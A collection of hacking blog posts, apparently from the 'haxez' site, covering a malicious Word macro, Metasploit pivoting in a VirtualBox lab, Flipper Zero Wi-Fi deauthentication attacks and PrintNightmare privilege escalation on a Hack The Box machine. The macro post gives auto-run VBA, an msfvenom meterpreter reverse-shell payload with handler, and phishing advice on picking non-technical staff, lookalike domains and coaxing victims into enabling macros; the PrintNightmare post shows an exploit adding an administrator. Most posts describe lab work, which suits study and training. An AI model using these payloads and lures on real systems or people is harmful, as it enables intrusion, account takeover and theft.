Making A Malicious Microsoft Office File

Hello world and welcome to haxez, in this post I’m going to be explaining how you can create a malicious Microsoft Office file to hack anyone. Ok, nothing is ever going to work 100% of the time. I was going through the Red Team Weaponization room on TryHackMe and I loved this technique so much that I wanted to make a separate post on it.

Malicious File With Microsoft Office Visual Basic

Microsoft Office applications have a feature that allows them to support Visual Basic programs or macros. Furthermore, these macros can be used to automate manual tasks to make the user’s life easier. However, we will be using these programs for something far more nefarious. In order to get started we need to create a new Word document. Once you have the document open, navigate to the view tab and click on Macros, then view Macros.

Malicious File Microsoft Office Visual Basic
Microsoft Office Visual Basic

Creating A Malicious File Macro In Microsoft Office

With the Macro window open, give your new sinister macro a name as shown in the screenshot below. You also need to ensure that the current document is selected from the dropdown menu. Once you have made those changes, click create.

Creating A Malicious File Macro In Microsoft Office
Creating A Macro In Microsoft Office

A new window should pop up with the title Microsoft Visual Basic for Applications. Within this window should be your Document1 macro editor. For our first macro, all we’re going to do is have the document spawn a dialog box with a message. This can be achieved with the snippet of code below.

Sub THM()
MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Macro In Microsoft Office Malicious File
Macro In Microsoft Office

Running the Microsoft Office Malicious File Macro

Next, we need to test that the Macro works. This can be done by simply clicking the green triangle icon within the macro window. This will execute the Visual Basic code which should create the message box. Fantastic, you have created your first macro. However, this doesn’t really accomplish anything as the user would have to open the macros themselves in order to run it.

Running the Microsoft Office Malicious File Macro
Running the Microsoft Office Macro

Automatic Macro Execution (sort of)

We can configure the macro to automatically execute when the document is opened (sort of). The user will still need to enable macros but once they have, the macro will execute. This can be done by editing the macro and adding the Document_Open and Auto_Open functions. You also need to specify which function to execute, in our case it is the EvilMacro function. The code will look similar to the snippet below.

Sub Document_Open()
EvilMacro
End SubSub AutoOpen()
EvilMacro
End SubSub EvilMacro()
MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Automatic Macro Execution (sort of)
Automatic Macro Execution (sort of)

In order for the macro to work, it needs to be saved in a Macro-Enabled format such as .doc and docm. To do this, save the document as a Word 97–2003 Template. Got to File, save Document1 and save as type Word 97–2003 Document and finally, save. Now if you close the document and reopen it, you may get a warning message saying that macros need to be enabled. Click enable and the macro will run.

Popping Programs with Microsoft Office Malicious File

That’s great and all but it doesn’t really do anything other than tell the user you hacked them. However, we can expand the functionality to do other things like launching programs. A standard proof of concept in penetration testing is showing that you had the ability to launch the calculator. This can be done by declaring a payload variable as a string using the Dim keyword. Then we specify calc.exe as the payload. Lastly, we create a Windows Scripting Host object to execute the payload. The script should look like the snippet below. Follow the same steps as before to save and close the document, then opening the document again should open the calculator.

Sub Document_Open()
EvilMacro
End SubSub AutoOpen()
EvilMacro
End SubSub EvilMacro()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
Popping Programs with Microsoft Office
Popping Programs with Microsoft Office

Injecting Some Venom

With the proof of concept out the way, it’s time to apply it to a real-world scenario. Microsoft Office Visual Basic Applications can be used to create reverse shells back to your attack box. For the purposes of this article, I will be using the TryHackMe labs as I couldn’t get it to work on my own Windows 10 lab. I did tinker with it for a few hours but was unsuccessful. The TryHackMe lab does have Windows Defender turned off.

Firstly, we need to create a Macro payload to add to our Microsoft Word Document, this can be done using the following msfvenom command and replacing the X’s with your attack boxes IP address and desired port:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=X -f vba

Once the payload has been generated, you need to add it as a new macro to your Office Word document. You also need to change the last line from Workbook_Open() to Document_Open() unless you’re working with Excel documents. Then, save the document as a Word 97–2003 Document.

Injecting Some Venom
Injecting Some Venom

Catching The Reverse Shell

The last step of the exploit is to capture the reverse shell once the document has been opened. In order to do this, we’re going to use Metasploit’s multi-handler. This can be done by typing use exploit/multi/handler. We’re then going to set the payload of windows/meterpreter/reverse_tcp. Finally, we’re going to set the LHOST and LPORT to the same values that we used in the msfvenom payload.

Catching The Reverse Shell
Catching The Reverse Shell
sysinfo
sysinfo

Triggering The Payload With Malicious File

When the victim opens the document, they will be greeted with a warning message that macros have been disabled. However, if you are using email as your delivery method then you can explain to the victim that it is important for them to enable macros. The victim then enables the macro, the payload executes and the reverse shell connects back to your attack box. You should now have a meterpreter shell on the victim’s machine.

Enable content
Enable content

Microsoft Office Delivery Methods

The are a number of different delivery methods that you can use to get the document into the hands of your victim. It is important to choose your victim appropriately when trying to compromise your target. For example, if you sent your payload to the head of the security team then your chances of success will likely be low. However, if you chose someone in the finance or sales department, someone with less IT security knowledge but who may still have a high level of access, then your success rate could be higher.

USB Delivery

USB delivery can be a powerful delivery mechanism to get malware onto a victim’s computer. Curiosity killed the cat and in this case, could compromise a network. If you were to load a USB device with the document and then label the document with something like “confidential” or “important”, I bet someone would want to take a peek at the contents.

Web Delivery

Web delivery is a convenient way to serve the malicious document to an unsuspecting victim. You could send the URL to the victim in an email, SMS, or other messaging technology. It also has the benefit of being more dynamic in that you can host multiple different payloads and make modifications to them. The USB delivery technique is a one-and-done but web delivery gives you more flexibility. The victim need only down the file and open it.

Email Delivery

Email delivery is a great option for a delivery technique provided the document doesn’t get flagged by antivirus. Furthermore, emails can be spoofed or you can register domain names similar to the victim’s domain so that the email seems more legitimate. For explain, if you had a victim with the email address [email protected] then you could register mydoma1n.com and send them an email from [email protected]. Granted it stands out but there are more sneaky ways to do this. You can use alt codes and characters from different alphabets to make it stand out less.

Furthermore, you could add context to the email. You could flag the email as important and explain to the user that they need to enable macros. If this email was then sent to a less technical employee and seemingly came from the IT department then it would increase the chances of compromise. This method exploits the trust the user has for the domain. It could be considered a social engineering attack.

Conclusion

Ok, the title of this post was clickbait and for that, I apologize. Granted the content of this post isn’t going to allow you to hack anyone with an Office document. The victim’s environment would have to be configured in such as way as to not detect the payload. Furthermore, you would have to trick them into running macros through some social engineering attack. However, there are many organizations out there that run outdated operating systems and versions of Microsoft Office. This attack could potentially work on outdated systems which is why you should keep your software up to date. Anyway, I had a fun but frustrating time trying to get this to work. I hope you enjoyed it.

Metasploit Pivoting To Hack Segregated Machines

Hello world, welcome to haxez. If you’re new to hacking and cybersecurity then you may have heard about pivoting. If you haven’t then let me explain. Pivoting is where you have compromised a host and discovered it is attached to another network. You then use that host to pivot your scans and attacks to hosts within that other network. For example, imagine you have just compromised a public-facing Web Application server. You check the network configuration and find that it is connected to an internal network. You can then use the compromised web application server to scan that internal network.

Pivoting
Pivoting

Pivoting Labs

I have seen some labs that allow you to practice pivoting but frankly not that many. Some require a complex setup process and others require paying a setup fee in order to access them. Then I had a light bulb moment. I’ve googled around and I haven’t seen many articles relating to using VirtualBox. VirtualBox has a number of network adaptor settings. One of these settings is a Host Only adapter. You can have multiple Virtual Machines configured to use this host-only adapter. You can also create multiple host-only adapters. My idea (I’m sure many others have had it) was to set up a lab in the following configuration.

  • Kali VM on the host only adapter 1.
  • Vulnerable VM 1 on the host only adapters 1 and 2.
  • Vulnerable VM 2 on the host only adapter 2.

The Kali VM wouldn’t be able to reach Vulnerable VM 2 unless it has exploited and is pivoting through Vulnerable VM 1.

Lab Set Up

Let’s get to work, first I downloaded Metasploitable 2. I created a new virtual machine and called it Meta1. I then cloned that virtual machine and called it Meta2.

Pivoting — Clone Virtual Machine
Pivoting — Clone Virtual Machine

Next, I used the host network manager to create a new host-only adapter.

Pivoting — Creating New Host-Only Adapter
Pivoting — Creating New Host-Only Adapter

After that, I configured the first network adapter on Meta1 to the first host-only adapter. Then I enabled and configured the second network adapter on Meta1 to the second host-only adapter. Finally, I configured the first network adapter on Meta2 to the second host-only adapter. I also made sure that my Kali Linux VM had its network set to the first host-only adapter.

Host Network Configuration
Host Network Configuration

Host Configuration

I booted Meta1 and logged in (msfadmin|msfadmin) and noticed that it only had one interface up (eth0). In its current condition, it won’t be able to talk to the second network and thus the second target. To rectify this, I had a quick google search and found this page in the Ubuntu documentation. The configuring interface section explains how to bring up an interface using DHCP.

sudo ip link set dev eth1 down
sudo dhclient eth1
Interface eth1 Configured
Interface eth1 Configured

Testing Pivoting

Now for the moment of truth, does this allow me to pivot from Meta1 to Meta2. First, we need to find the IP address of the host on the same network as us. You can do this by running ifconfig on the host or the proper way by performing a Nmap scan. Great, our host is online and has the IP address 192.168.56.106.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:51 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:DE:8C:96 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.106
Host is up (0.00025s latency).
MAC Address: 08:00:27:82:70:32 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next, I needed a way to establish a connection to the host which would allow quick and easy set up of a pivot. Let’s launch Metasploit.

Metasploit

For simplicity, I chose the ssh_login module and configured it with the remote host’s IP address and the username and password.

msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no
BRUTEFORCE_SPEED 5 yes
DB_ALL_CREDS false no
DB_ALL_PASS false no
DB_ALL_USERS false no
DB_SKIP_EXISTING none no
PASSWORD msfadmin no
PASS_FILE no
RHOSTS 192.168.56.106 yes
RPORT 22 yes
STOP_ON_SUCCESS false yes
THREADS 1 yes
USERNAME msfadmin no
USERPASS_FILE no
USER_AS_PASS false no
USER_FILE no
VERBOSE false yes

I then ran the exploit command and waited for it to complete. Great, we have established a connection to our host but now we need to upgrade it to a Meterpreter shell. In order to do this, I first figured out what session it was using the session command.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.56.102:44505 -> 192.168.56.106:22 (192.168.56.106)
3 shell linux SSH root @ 192.168.56.102:41553 -> 192.168.56.106:22 (192.168.56.106)

Next, I instructed Metasploit to upgrade the session to a Meterpreter session.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433
[*] Sending stage (989032 bytes) to 192.168.56.106
[*] Command stager progress: 100.00% (773/773 bytes)

Creating The Pivot

To create the pivot, I jumped into the newly created Meterpreter session and ran the ifconfig command to see what available networks there were.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...meterpreter > ifconfigInterface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:82:70:32
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.106
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe82:7032
IPv6 Netmask : ffff:ffff:ffff:ffff::Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:41:4f:ce
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.242.3
IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::a00:27ff:fe41:4fce
IPv6 Netmask : ffff:ffff:ffff:ffff::

Next, I sent the session to the background, selected the autoroute module, and configured it to use session 4.

msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes
NETMASK 255.255.255.0 no
SESSION 4 yes
SUBNET no

I then ran the module and it create the pivot for me.

Finding Hosts Through Pivoting

I then needed to find the target host. Of course, I could have run ifconfig on it but where is the fun in that. I switched to the ping_sweep module and configured it to use session 4. I then configured the IP address of the remote network and ran the module.

msf6 post(multi/gather/ping_sweep) > options
Module options (post/multi/gather/ping_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.242.0/24 yes
SESSION 4 yes
msf6 post(multi/gather/ping_sweep) > run
[*] Performing ping sweep for IP range 192.168.242.0/24
[+] 192.168.242.3 host found
[+] 192.168.242.2 host found
[+] 192.168.242.4 host found

Scanning Ports Through Pivoting

Sure enough, our host was there. Don’t ask me what the other ones are, I honestly don’t know and at this point, I’m too afraid to ask. Our target IP address was 192.168.242.4. So what’s next? service discovery obviously. I selected the portscan/tcp module and configured it to target the host. I ran the module and sure enough it found all the open ports on the host.

msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes
DELAY 0 yes
JITTER 0 yes
PORTS 1-10000 yes
RHOSTS 192.168.242.4 yes
THREADS 1 yes
TIMEOUT 1000 yes msf6 auxiliary(scanner/portscan/tcp) > run[+] 192.168.242.4: - 192.168.242.4:25 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:23 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:21 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:22 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:53 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:80 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:111 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:139 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:445 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:512 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:513 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:514 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:1099 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:1524 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:2049 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:2121 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:3306 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:3632 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:5432 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:5900 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6000 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6667 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6697 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8009 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8180 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8787 - TCP OPEN
[*] 192.168.242.4: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Just to be on the safe side I tried to ping the host from my Kali VM to ensure I hadn’t messed something up. Sure enough, the network was unreachable.

┌──(kali㉿kali)-[~]
└─$ ping 192.168.242.4
ping: connect: Network is unreachable

Conclusion

So that’s what I’ve been doing today. I had this idea late last night when trying to get to sleep. It actually kept me awake for a while until I got up and wrote it down. This happens to me a lot but I do occasionally have some good ideas. Anyway, I really enjoyed this as I haven’t had much opportunity to experiment with pivoting. I’m actually shocked that I didn’t think of doing this sooner as it’s such an obvious method of practicing it. It was fun setting up, other than having a few errors with Metasploit due to some scripts being broken. Anyway, that’s me done for the day. I will record a video on this soon and upload it to the tube but until then.

Hacking Wi-Fi Networks With The Flipper Zero and Marauder

Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero with Marauder to attack Wi-Fi networks. By default, the Flipper Zero doesn’t have Wi-Fi capabilities. However, with the addition of the Wi-Fi developer board, you can add this functionality. The Wi-Fi developer board is rocking an ESP32-S2 module. With this module, you can perform Wi-Fi penetration testing such as probing attacks, de-authentication attacks, SSID rickrolling, and more.

The Wi-Fi developer board
The Wi-Fi developer board

Installing Marauder to the Flipper Zero Wi-Fi Development Board

The Wi-Fi developer board can be purchased from the Flipper Zero website for $29.00. Obviously, As I’m in the UK I purchased mine from Joom for £36.60 excluding VAT and shipping (Ouch). As mentioned previously, the board adds Wi-Fi functionality to the Flipper Zero but you need to do a bit of work beforehand.

First, you need to download the Marauder firmware and flash it to the developer board. I would recommend using the UberGuidoZ Flipper repository to make the process easier. Unzip the zip archive and locate the flash.bat file. Then, while holding down the boot button, connect the Wi-Fi development board to your computer via USB and hold the boot button down for 3 seconds.

Installing Marauder to the Wi-Fi Flipper Zero Development Board
Installing Marauder to the Wi-Fi Development Board

Your computer should recognize the device. Now, double-click the batch file. You may get a Windows security alert, if that is the case click show more and then run anyway. This should spawn a command prompt window similar to the one below. Furthermore, it should have a number of options including the ability to flash the Marauder firmware. Select option 1 and wait patiently for it to install.

Flipper Zero Marauder install
Marauder install

Adding Marauder Wi-Fi Functionality To The Flipper Zero

Unfortunately, Flipper Zero doesn’t have the functionality to use the Marauder Firmware out of the box. However, you can install some custom firmware that contains the Marauder tools in order to use it. Although, That is going to be outside the scope of this post but feel free to click the image below to read my article on installing the RogueMaster firmware. Once you’ve read that, come back here and finish the article.

Marauder Flipper Zero Menu

Now that you have Maurader and RogueMaster installed, you should have access to the Marauder menu on your Flipper Zero. In order to access it, head to Applications > GPIO > [ESP32 WiFi Marauder]. After selecting Marauder you should have a number of options including View Log from, Scap AP, SSID, List, Select, Clear List, Attack, Beacon Spam, Sniff, Sniff PMKID on channel, Channel, Settings, Update, Reboot, and Help. Some of these options have sub-options that can be accessed by pressing left or right on your Flipper.

Flipper Zero Marauder Menu
Marauder Menu

Scanning Access Points

One of the first options in Marauder is Scan AP. This option lets you scan for access points within your nearby area. Furthermore, the results of these scans can be used with other attacks such as de-authentication and probe attacks. The image below shows that I have started a scan for local access points. The results will be displayed below and saved to the AP list.

Scanning Access Points
Scanning Access Points

Listing Access Points

The next option in the list is to list the access points that you have just scanned. This is a convenient feature as it assigns a number to each of the access points. This number can be used later to select the access point you want to attack. The image below shows the results of running the list command after running the Scan AP command. As you can see, it shows 5 access points (0 to 5). However, the list can be scrolled on indefinitely depending on the number of access points.

Listing Access Points
Listing Access Points

Selecting An Access Point

The select option allows you to select an access point based on the list. At least, that’s what I hope it is doing. Regardless, the option presents a keyboard that allows you to type in the access point you want to select. Once selected, you can then launch attacks against the selected access point.

Selecting An Access Point
Selecting An Access Point

Rick Roll Attack

The first attack that I’m going to talk about is the Rick Roll attack. That’s right, you can rickroll people but not in the conventional sense of sending them the Youtube URL. This attack is mostly harmless but is a cool party trick. By selecting the Rick Roll attack method, you send data out from the Flipper Wi-Fi board and create a bunch of dummy access points named in accordance with the lyrics from the song. As you can see from the image below, I have launched the attack and there are a number of new access points available.

Rick Roll Attack
Rick Roll Attack

Flipper Zero Marauder Wi-Fi De-Authentication Attack

The next attack I want to talk about is the Wi-Fi de-authentication attack. This attack can be useful when trying to capture handshakes. Wireless handshakes will contain the hashed password for the access point. Capturing the hash would allow you to crack it and then access the access point. The de-authentication attack works by sending de-authentication frames to the wireless access point. This packet is usually spoofed from the client and forces them to disconnect.

Wi-Fi De-Authentication Attack
Wi-Fi De-Authentication Attack

Probe Attack

Probes are sent out by devices when not connected to a wireless access point. They send probes for access points that they have previously connected to in order to see if the access point responds. A probe attack is essentially spamming probe requests to the select access point. I believe the desired output of this attack is to confuse the access point and potentially consume resources leading to a denial of service conditions. Don’t quote me on that though as I’m not 100% sure and am just going off of the articles I’ve read so far. I will update this if I get any more insight into the purpose of this attack.

Probe Attack
Probe Attack

Sniffing

The Wi-Fi developer board with Marauder also has a number of sniffing options including sniffing de-authentication packets, pwnagatchi packets, beacon packets, esp packets, and pmkid packets. I haven’t played with the sniffing options too much but it doesn’t seem like you can run both attack payloads and sniffing payloads at the same time. I will look into these options further at a later date.

Sniffing
Sniffing

Flipper Zero Marauder Conclusions

There is a lot more to the Marauder firmware than I’ve covered in this post. it has the ability to sniff packets and other things that I haven’t explored yet. However, I wanted to make a post about it as there aren’t many posts about it. Hopefully, this should get you up and running with the Marauder firmware and more people will make content about it. Anyway, the firmware and Wi-Fi development board are excellent additions to the Flipper Zero if you’re looking to increase its functionality. I can’t wait to see what other things people make.

Print Nightmare Privilege Escalation

Hello world, welcome to Haxez. In this post, I’m going to be demonstrating how to perform the Print Nightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021–1675.ps1 script by Caleb Stewart on GitHub. I’ve just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It’s easy to see why it is such a serious vulnerability.

What Is Print Nightmare?

The vulnerability exists because the Spooler service does not properly validate the driver when it is installed on a system. This can allow an attacker to install a malicious driver. Once installed, an attacker can exploit the vulnerability in the Print Spooler service to execute arbitrary code with system-level privileges.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges. This means that it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the appropriate patches and updates provided by Microsoft. Additionally, implementing other measures such as restricting access to the Spooler service and disabling it on systems.

The Scenario

A threat actor has obtained network access and a domain user’s credentials whether through phishing or some other social engineering attack. They can check the spooler service on the target host via the ‘impacket-rpcdump’ tool. If the following protocol is included in the output then it could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--
Print Nightmare rpcdump

The PrintNightmare Payload

In order to leverage this vulnerability to elevate privileges, we first need a payload to exploit it. Such an exploit is publically available on GitHub right now at the following URL https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25-- https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’
CVE-2021-1675.ps1.1 100%[============================================================================>] 174.38K --.-KB/s in 0.03s
2023-03-17 18:04:26 (4.96 MB/s) - 'CVE-2021-1675.ps1.1' saved [178561/178561]
Print Nightmare wget payload

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host with the user tony. Furthermore, the password for tony’s account is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and I’ve also specified my script directory with the ‘-s’ flag.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
Evil WinRM

The Print Nightmare Exploit

We can now load the script that we saved to our script directory earlier by typing the script name (CVE-2021–1675.ps1). This will then load additional options into Evil-WinRM including the ability to ‘Invoke-Nightmare’. Typing ‘Invoke-Nightmare’ will then generate a new payload that will create a new user and add the user as a local administrator.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' ( ' (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type
[+] Dll-Loader
[+] Donut-Loader
[+] field
[+] func
[+] get_nightmare_dll
[+] Invoke-Binary
[+] Invoke-Nightmare
[+] New-InMemoryModule
[+] psenum
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
Print Nightmare EvilWinRm

The Print Nightmare Consequence

We are now able to remote the target system with the new user. As you can see from the output below, the new user is a member of the local administrator’s group. From here we could install persistence or perform an LSA dump to dump credentials from memory. If a Domain Administrator has logged in to this system then it would be game over for the domain controller.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.

*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents>
Whoami

Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

Kali Linux Virtual Machine Shared Folder

